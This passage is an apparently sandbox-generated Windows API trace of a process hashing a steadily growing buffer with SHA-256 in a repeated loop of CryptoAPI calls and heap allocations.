	[0199.766] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692748
	[0199.766] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692748, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692748, pdwDataLen=0x1283b0) returned 1
	[0199.766] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.766] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.766] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.766] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.766] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0199.766] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.766] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692770
	[0199.766] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692770, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692770, pdwDataLen=0x1283b0) returned 1
	[0199.766] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.766] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.766] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.767] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.767] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0199.767] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.767] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692798
	[0199.767] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692798, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692798, pdwDataLen=0x1283b0) returned 1
	[0199.767] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.767] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.767] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.767] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.767] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0199.767] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.767] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26927c0
	[0199.767] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26927c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26927c0, pdwDataLen=0x1283b0) returned 1
	[0199.767] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.767] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.767] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.768] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.768] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0199.768] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.768] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26927e8
	[0199.768] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26927e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26927e8, pdwDataLen=0x1283b0) returned 1
	[0199.768] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.768] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.768] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.768] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.768] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0199.768] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.768] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692810
	[0199.768] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692810, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692810, pdwDataLen=0x1283b0) returned 1
	[0199.768] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.768] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.768] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.769] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.769] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0199.769] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.769] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692838
	[0199.769] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692838, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692838, pdwDataLen=0x1283b0) returned 1
	[0199.769] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.769] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.769] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.769] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.769] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0199.769] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.769] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692860
	[0199.769] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692860, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692860, pdwDataLen=0x1283b0) returned 1
	[0199.769] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.769] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.769] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.770] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.770] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0199.770] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.770] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692888
	[0199.770] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692888, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692888, pdwDataLen=0x1283b0) returned 1
	[0199.770] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.770] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.770] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.770] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.770] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0199.770] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.770] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26928b0
	[0199.770] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26928b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26928b0, pdwDataLen=0x1283b0) returned 1
	[0199.770] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.770] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.770] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.771] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.771] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0199.771] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.771] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26928d8
	[0199.771] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26928d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26928d8, pdwDataLen=0x1283b0) returned 1
	[0199.771] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.771] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.771] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.771] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.771] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0199.771] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.771] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692900
	[0199.771] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692900, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692900, pdwDataLen=0x1283b0) returned 1
	[0199.771] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.771] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.771] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.772] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.772] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0199.772] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.772] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692928
	[0199.772] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692928, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692928, pdwDataLen=0x1283b0) returned 1
	[0199.772] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.772] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.772] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.772] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.772] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0199.772] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.772] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692950
	[0199.772] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692950, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692950, pdwDataLen=0x1283b0) returned 1
	[0199.772] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.772] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.772] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.773] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.773] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0199.773] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.773] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692978
	[0199.773] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692978, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692978, pdwDataLen=0x1283b0) returned 1
	[0199.773] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.773] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.773] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.773] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.773] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0199.773] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.773] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26929a0
	[0199.773] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26929a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26929a0, pdwDataLen=0x1283b0) returned 1
	[0199.773] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.773] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.773] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.774] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.774] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0199.774] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.774] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26929c8
	[0199.774] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26929c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26929c8, pdwDataLen=0x1283b0) returned 1
	[0199.774] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.774] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.774] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.785] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.785] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0199.785] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.785] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26929f0
	[0199.785] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26929f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26929f0, pdwDataLen=0x1283b0) returned 1
	[0199.785] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.785] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.786] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.786] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.786] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0199.786] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.786] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692a18
	[0199.786] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692a18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692a18, pdwDataLen=0x1283b0) returned 1
	[0199.786] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.786] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.786] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.787] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.787] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0199.787] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692a40
	[0199.787] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692a40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692a40, pdwDataLen=0x1283b0) returned 1
	[0199.787] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.787] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.787] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.787] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.788] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0199.788] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.788] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692a68
	[0199.788] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692a68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692a68, pdwDataLen=0x1283b0) returned 1
	[0199.788] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.788] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.788] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.788] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.788] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0199.788] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.788] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692a90
	[0199.788] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692a90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692a90, pdwDataLen=0x1283b0) returned 1
	[0199.788] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.788] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.789] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.789] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.789] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0199.789] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692ab8
	[0199.789] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692ab8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692ab8, pdwDataLen=0x1283b0) returned 1
	[0199.789] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.789] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.789] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.789] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.789] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0199.789] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692ae0
	[0199.790] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692ae0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692ae0, pdwDataLen=0x1283b0) returned 1
	[0199.790] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.790] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.790] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.790] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.790] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0199.790] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.790] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692b08
	[0199.790] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692b08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692b08, pdwDataLen=0x1283b0) returned 1
	[0199.790] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.790] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.790] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.791] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.791] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0199.791] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.791] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692b30
